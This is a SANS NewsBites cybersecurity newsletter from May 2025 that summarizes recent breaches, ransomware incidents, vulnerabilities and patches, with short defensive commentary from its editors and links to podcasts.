SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals

Experience SANS training through course previews.
Learn MoreLet us help.
Contact usBecome a member for instant access to our free resources.
Sign UpWe're here to help.
Contact UsEach year, the SANS Institute’s must-see keynote session at RSA Conference delivers a forward-looking briefing on the most critical and emerging attack vectors in cybersecurity. The 2025 session surfaced five new attack techniques that are reshaping how enterprises must think about cyber risk. Moderated by SANS Technology Institute President Ed Skoudis, the 45-minute session brought together top SANS experts to assess how today’s attackers are escalating both their technical sophistication and their impact on business operations.
The attack techniques outlined in the SANS RSAC 2025 keynote underscore a common theme: cybersecurity is no longer confined to the security operations center—it’s a leadership issue that impacts every layer of the enterprise. The threats of tomorrow demand a strategic, integrated response rooted in visibility, agility, and cross-functional alignment.
Read more about this year’s keynote:
www.sans.org/press/: RSAC 2025: The SANS Institute’s Top 5 Most Dangerous New Attack Techniques to Watch
www.sans.org/blog/: Inside RSAC 2025: The Five Emerging Attack Techniques That Demand Your Attention
Following a cyberattack discovered April 23, 2025, Japanese freight logistics company Kintetsu World Express (KWE) has continued to update a “Customer Notice for Service Disruptions” page on their website, posting a separate update on April 28 identifying the incident as a ransomware attack. The company described the impact as “ongoing server failure,” stating that the system had not recovered and operations were still affected. KWE has established an Emergency Response Headquarters, has notified the Japanese police, and is working with external professionals to investigate the scope and cause of the incident. An April 30 update states that most systems are now fully functional while the company remediates and recovers systems, simultaneously “conducting a comprehensive environmental assessment” and “collaborating with external IT partners to enhance [their] environment using industry standard cybersecurity solutions.” Investigation is ongoing, and customers will be immediately notified if their data have been impacted.
Neely; NB May 2, 2025; Kinetsu World Express Recovering From Ransomware AttackIn April of 2024, the threat actor 888 compromised KWE, releasing names, emails, locations and countries of 819 of their clients. The question is, what was overlooked in the remediation process a year ago? Make sure you're looking at your entire security posture, not just affected systems. Consistent security, such as MFA across all systems, not only keeps the bar high, but also avoids having a weak link. Have a conversation about entry points and trust relationships, and how they can be better secured.
Pescatore; NB May 2, 2025; Kinetsu World Express Recovering From Ransomware AttackJust my usual comment that the "pre" in "precautions" indicates actions that should best be taken *before* the cautionary event, not after. Also "… enhance our environment using industry standard cybersecurity solutions" should really be aiming higher – correct the deficiencies *and* raise the bar as a precaution against more sophisticated future attacks.
Dukes; NB May 2, 2025; Kinetsu World Express Recovering From Ransomware AttackNo country or company is immune to a ransomware attack. Ok, ok, perhaps one – DPRK. By now, every business is familiar with the term ransomware and its possible effect on their business. Use the handy resource, Blueprint for Ransomware Defense, as a guide for mitigation, response, and recovery. It’s been available for 3 years now. https://securityandtechnology.org/ransomwaretaskforce/blueprint-for-ransomware-defense/
Ascension Healthcare, which operates 142 hospitals across the US, has begun notifying patients of a third-party breach that compromised their personal and health information. According to a breach notification sent to patients, Ascension learned of the incident in early December 2024. A subsequent investigation found that "Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner." This in not Ascension’s first encounter with breaches; a May 2024 ransomware attack prompted the company to notify 5.4 million people that their data had been compromised.
Neely; NB May 2, 2025; Ascension Patient Data Breached Through Former Business AssociateThe former business partner appears to have been using Cleo's file transfer platform, which was compromised by the Cl0p ransomware gang. The question is, why was data still being transferred to the former partner? Data disposition steps, to include verified disabling of any file transfers and system interconnections as well as the disposition of data already shared, need to be active steps in the contract termination process. Review your contract management processes to ensure not only that your bases are covered but also that everyone knows the players involved.
Pescatore; NB May 2, 2025; Ascension Patient Data Breached Through Former Business AssociateNot a lot of information on how/why they "inadvertently disclosed information." I’d at least like to see statements in the "What we are doing now" section of these disclosures that detail "what we are doing now to make sure this doesn't happen again" vs. the usual offer of credit checking services.
Dukes; NB May 2, 2025; Ascension Patient Data Breached Through Former Business AssociateSeems like Ascension Healthcare needs to revisit its data retention and usage policies, again. Ascension said it's "…committed to the privacy and security of its patients’ information." Two cyber incidents in the span of a year makes that questionable. It's more like they're committed to a lackluster cybersecurity program.
A group of technology vendors has published a draft framework for a standard companies can use to announce end of support for their products. OpenEoX categorizes a product’s lifecycle into General Availability (GA), End of Sale (EoS), End of Security Support (EoSSec), and End of Life (EoL). The document, which was published through the Organization for the Advancement of Structured Information Standards (OASIS), notes that "Currently, information about End-of-Life (EoL), End-of-Security-Support (EoSSec), and other states for software, hardware, services and specifications is often fragmented and inconsistently defined across the industry." The project’s "core objectives" are transparency, efficiency, and unification.
Pescatore; NB May 2, 2025; Tech Companies Publish Draft OpenEoX FrameworkNothing major but a good step forward so that SBOM tools and other configuration management processes can more easily discover and send alerts on out-of-support software in use. IT needs to budget for realistic software replacement cycles.
Neely; NB May 2, 2025; Tech Companies Publish Draft OpenEoX FrameworkHaving consistent definitions and use of terms will help the enterprise with lifecycle planning. One hopes this will also translate to products and services targeted to SOHO environments as well. The much harder problem is acting on that plan. Have the hard conversation about how lifecycle activities will remain funded. Compare the outcome of that conversation to your plans regarding Windows 10's end of support this October.
Dukes; NB May 2, 2025; Tech Companies Publish Draft OpenEoX FrameworkHaving standardization around product lifecycle terms is a good thing. It’s a bit surprising that this has never been done. That said, it doesn’t solve the problem of organizations knowingly running obsolete products (HW/SW), but then, that’s what we have litigation for.
Murray; NB May 2, 2025; Tech Companies Publish Draft OpenEoX FrameworkWorthy and useful idea. It suggests that this lifecycle is a limitation to the value of a product and should be planned and published as part of the announcement of the product.
The UK Information Commissioner’s Office (ICO) will not investigate a 2023 ransomware attack that disrupted the British Library’s operations for months. The Library reported the incident to ICO in October 2023 and subsequently published a detailed review of the incident in March 2024: the "likely … point of entry" was determined to be a server that was not protected with multi-factor authentication (MFA). In a recent statement, the ICO writes that "further investigation would not be the most effective use of [their] resources." The decision is indicative of a government stance that avoids imposing penalties on organizations responding to ransomware attacks with best practices. The ICO writes that they "commend the British Library for being open and transparent about its system vulnerabilities that contributed to the incident, the impact it has had, and the improvements made so far to protect people’s personal information."
Dukes; NB May 2, 2025; ICO Will Not Investigate British Library’s 2023 Ransomware AttackThe 'carrot and stick' metaphor seems appropriate in this case. ISO believes the actions taken by the British Library both during and after the ransomware event should be rewarded, hence the 'carrot.' Far too many institutions seek to limit exposure, not even referring to the event as a ransomware attack, nor publishing a cyber incident review. In those cases, the 'stick' is more appropriate.
The Record
The Register
ICO
BL
Oligo Security has published a blog post describing their discovery of 23 vulnerabilities in the Apple AirPlay software development kit (SDK) and AirPlay Protocol. Oligo emphasizes the enormous number of potentially vulnerable devices, as these flaws affect iOS, iPadOS, macOS Sequoia, Sonoma, and Ventura, visionOS, watchOS, tvOS, and CarPlay, as well as tens of millions of "third-party devices that leverage the AirPlay SDK," such as speakers. Attackers could exploit these vulnerabilities to carry out attacks via shared wireless networks or peer-to-peer connections; two of the flaws are wormable zero-click RCE exploits that could allow attackers to "deploy malware that spreads to devices on any local network the infected device connects to." Possible attacks enabled by these flaws include "Remote Code Execution (RCE), Access Control List (ACL) and user interaction bypass, Local Arbitrary File Read, Sensitive Information Disclosure, Man-in-the-Middle (MITM) attacks, and Denial of Service (DoS) attacks." The researchers have dubbed the collection of chainable flaws and attack vectors "Airborne." Users are urged to update all devices to the latest software versions; Oligo also recommends disabling AirPlay Receiver, restricting AirPlay access via firewall rules, and restricting AirPlay settings to only allow AirPlay for "Current User."
Neely; NB May 2, 2025; Apple AirPlay Devices Vulnerable to Zero-Click RCEApple released fixes for AirBorne in iOS/iPadOS 18.4, macOS 13.7.5, 14.7.5 and 14.5, visionOS 2.4 and watchOS 11.4. Make sure that your devices are running these versions or newer. Setting AirPlay to "Current User" restricts access to devices logged into the same Apple Account. If you're not using AirPlay receiver, turn it off. Make sure your IoT devices run current firmware, and consider monitoring/limiting use of AirPlay (port 7000) on your network; document this decision so you don't have a recurring agenda item.
Dukes; NB May 2, 2025; Apple AirPlay Devices Vulnerable to Zero-Click RCEPretty incredible research by Oligo, and kudos to them for responsibly working with AAPL before releasing their findings. Outside the severity of the vulnerabilities, the report highlights a continued weakness of the third-party product ecosystem. AAPL has done its part, creating software updates for its affected products; now third-party vendors that use the SDK must do their part. Some will, some won't, and of course users must download and install the software patch. We may be talking about this for quite some time.
Oligo
Ars Technica
BleepingComputer
SecurityWeek
Microsoft informed Daniel Wade, an independent security researcher, that he is not the first to express alarm that Windows Remote Desktop Protocol (RDP) allows logins using revoked passwords, an issue which Wade says "isn't just a bug. It's a Trust Breakdown" because users expect a password change to curb unauthorized access. Wade's report states that "even newer passwords may be ignored while older ones continue to function," bypassing cloud verification, MFA, and Conditional Access policies to allow persistent RDP access. Microsoft has been aware of the issue since 2023 and does not consider it a vulnerability, claiming it is "a design decision to ensure that at least one user account always has the ability to log in no matter how long a system has been offline." After RDP authenticates a user's first login online, the credential is then stored locally in an encrypted format and used to validate future logins. If a user changes their Microsoft or Azure password in the cloud, the cached encrypted local credential is not updated or removed, so the old password will still grant access to the machine. Will Dormann, senior vulnerability analyst at Analygence, believes that Microsoft's updated documentation notifying users of password caching is not adequate, and he notes that if a Microsoft or Azure account is compromised, "the only course of action is to configure RDP to authenticate against locally stored credentials only."
The US Cybersecurity and Infrastructure Security Agency (CISA) has added three vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, one each affecting Broadcom Brocade Fabric OS, Qualitia Active! Mail clients, and Commvault Web Servers. CVE-2025-1976, CVSS score 8.6, patched in Brocade Fabric OS 9.1.1d7, allows an attacker with admin privileges to “execute arbitrary code as if they had full root level access,” potentially executing existing commands or modifying the OS itself, due to a flaw in IP address validation. CVE-2025-42599, CVSS score 9.8, fixed in Qualitia Active! Mail 6 BuildInfo: 6.60.06008562, allows a remote unauthenticated attacker to execute arbitrary code or create a denial-of-service (DoS) condition by sending a specially crafted request, due to a stack-based buffer overflow vulnerability. CVE-2025-3928, CVSS score 8.7, fixed in Commvault software versions 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux, allows a remote unauthenticated attacker to compromise webservers by creating and executing webshells, due to an unspecified vulnerability. Commvault disclosed the zero-day exploitation in a March 7, 2025 advisory, stating that the attacker was a “suspected nation-state threat actor,” following up on April 27, 2025 to add that they are working with affected customers, and “there has been no unauthorized access to customer backup data that Commvault stores and protects, and no material impact on our business operations or our ability to deliver products and services.” The update shares best practices and indicators of compromise (IoCs), and states that Commvault is working with the FBI and CISA while improving key rotation and monitoring rules.
Neely; NB May 2, 2025; CISA Adds Flaws to KEV from Broadcom Brocade Fabric OS, Qualitia Active! Mail, and Commvault Web ServersIf you're using Brocade's Fabric OS, you should be on version 9.2 or higher. Version 9.1 removed the direct root access but still has admin roles the exploit leverages. 9.2 better refines the admin role management. Note the Commvault update only applies to self-hosted instances, the SaaS version has been updated. After installing the update, make sure that you're following their updated security best practices. These KEV entries have a due date of May 19th.
CISA
Broadcom
Commvault
BleepingComputer
SecurityWeek
SonicWall has updated two security advisories – one from 2024 and another from 2023 – to indicate that the vulnerabilities they address are now being actively exploited. Both advisories address multiple vulnerabilities in SonicWall SMA100 SSL-VPN. The flaw from the 2024 advisory (CVE-2024-38475) that is being exploited is a critical path traversal vulnerability that "allows an attacker to map URLs to file system locations that are permitted to be served by the server." The flaw from the 2023 advisory (CVE-2023-44221) that is being exploited is a high-severity post authentication OS command injection vulnerability that "allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as a 'nobody' user." The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-44221 to the Known Exploited Vulnerabilities (KEV) catalog on May 1 with a mitigation due date of May 22.
Neely; NB May 2, 2025; Older SonicWall Vulnerabilities are Being Actively ExploitedThe time to hold off on the SonicWall updates is past. Double check the product lifecycle tables for your SonicWall devices: you may find the fix is replacement. Yes, they still work, so do the exploits, and I feel your pain. CVE-2023-44112, command injection flaw, has a CVSS score of 7.2; CVE-2024-38475, improper escaping of output, has a CVSS score of 9.1; and the old SonicWall SMA 100 flaw, which is also being exploited, CVE-2021-20035, command injection flaw, has a CVSS score of 6.5.
SecurityWeek
SCWorld
BleepingComputer
SonicWall
SonicWall
NVD
NVD
Following close on the heels of a cyberattack that has disrupted operations at British retailer Marks & Spencer, both the Co-op and Harrods have reported being targeted by cyberattacks. On Wednesday, April 30, the Co-op shut down portions of their IT systems after they detected an attempted intrusion, disrupting the company’s back office and call center. On Thursday, May 1, Harrods reported that they "recently experienced attempts to gain unauthorised access to some of [their] systems …[and they] have restricted internet access at [their] sites." These attacks come days after Marks & Spencer experienced an attack that has caused them to temporarily shut down operations of their online stores.
Neely; NB May 2, 2025; Two More British Retailers Targeted by Attempted CyberattacksCo-op is a competitor to M&S with about 3000 locations. Both Co-op and Harrods were able to take proactive steps to block/contain the attack, minimizing customer impact. Even so, Co-op has taken the added measure of requiring cameras to be on for meetings due to suspicions of hackers being present. Not a bad reminder: we should be confirming attendees at business meetings, as well as checking how recently recurring meeting attendees and credentials were verified/updated.
The Record
The Guardian
BleepingComputer
BleepingComputer
BBC
The Guardian
Google and Mozilla have released updates for their Chrome and Firefox browsers to address multiple vulnerabilities. Google released Chrome 136 to the stable channel; the newest version of Chrome addresses eight vulnerabilities, four of which were brought to Google’s attention by external researchers. Of those, one is rated high-severity; the other three are rated medium- and low-severity. Mozilla released Firefox 138, which addresses 11 vulnerabilities, four of which are rated high-severity.
Neely; NB May 2, 2025; Chrome and Firefox Updates Address Multiple VulnerabilitiesBet you just checked your About Chrome/About Firefox to see what version was running. It's easy to ignore the update available indicator; I'm thinking I need a calendar reminder to make sure I'm keeping my personal devices updated. Don't forget those VMs you infrequently use, or that laptop in the closet, you know the one you grab on the way out, planning to apply updates at the airport? Make sure that your IT staff is all over getting these updates deployed. If you're using Firefox ESR, 128.10.0 was released April 29 to address these same flaws. ESR 139 release is scheduled for late May, and available in beta now.
Murray; NB May 2, 2025; Chrome and Firefox Updates Address Multiple VulnerabilitiesPrefer single-purpose-built clients for sensitive applications. The chances that all browsers are even current, much less reliable, are vanishingly small.
Internet Storm Center StormCast Friday, May 2, 2025
More Steganography; Malicious Python Packages Gmail C2; BEC to Steal Rent Payments
https://isc.sans.edu/podcastdetail/9434
Steganography Analysis With pngdump.py: Bitstreams
More details from Didier as to how to extract binary content hidden inside images
https://isc.sans.edu/diary/Steganography+Analysis+With+pngdumppy+Bitstreams/31904
Using Trusted Protocols Against You: Gmail as a C2 Mechanism
Attackers are using typosquatting to trick developers into installing malicious python packages. These python packages will use Gmail as a command and control channel by sending email to hard coded Gmail accounts
https://socket.dev/blog/using-trusted-protocols-against-you-gmail-as-a-c2-mechanism
Security Brief: French BEC Threat Actor Targets Property Payments
A French business email compromise threat actor is targeting property management firms to send emails to tenants tricking them into sending rent payments to fake bank accounts
SANS.edu Research Journal
https://isc.sans.edu/j/research
Internet Storm Center StormCast Thursday, May 1, 2025
SonicWall Attacks; Spoofing Adversary in the Middle Attacks; Cached Windows RDP Credentials
https://isc.sans.edu/podcastdetail/9432
Web Scanning for SonicWall Vulnerabilities CVE-2021-20016
For the last week, scans for SonicWall API “login” and “domain” endpoints have skyrocketed. These attacks may be exploiting an older vulnerability or just attempting to brute force credentials.
https://isc.sans.edu/diary/Web+Scanning+Sonicwall+for+CVE202120016/31906
The Wizards APT Group SLAAC Spoofing Adversary in the Middle Attacks
ESET published an article with details regarding an IPv6-linked attack they have observed. Attackers use router advertisements to inject fake recursive DNS servers that are used to inject IP addresses for hostnames used to update software. This leads to the victim downloading malware instead of legitimate updates.
Windows RDP Access is Possible with Old Credentials
Credential caching may lead to Windows allowing RDP logins with old credentials.
Internet Storm Center StormCast Wednesday, April 30, 2025
SMS Attacks; Apple Airplay Vulnerabilities
https://isc.sans.edu/podcastdetail/9430
More Scans for SMS Gateways and APIs
Attackers are not just looking for SMS Gateways like the scans we reported on last week, but they are also actively scanning for other ways to use APIs and add on tools to send messages using other people’s credentials.
https://isc.sans.edu/diary/More+Scans+for+SMS+Gateways+and+APIs/31902
AirBorne: AirPlay Vulnerabilities
Researchers at Oligo revealed over 20 weaknesses they found in Apple’s implementation of the AirPlay protocol. These vulnerabilities can be abused to execute code or launch denial-of-service attacks against affected devices. Apple patched the vulnerabilities in recent updates.
Catch up on recent editions of NewsBites or browse our full archive of expert-curated cybersecurity news.
Browse ArchivePalo Alto Networks leads in cloud innovation, leveraging threat research and a scalable security program.
As the cyber threat landscape continues to evolve, the past year has presented unique challenges and opportunities for cyber threat intelligence professionals.
Join us for this practical, insight-packed webcast and learn how to confidently launch or strengthen your DLP program for immediate value and long-term success.
Join us for the SANS Emerging Threats Summit Solutions Track on May 14 to explore real-world strategies for tackling tomorrow’s cybersecurity risks.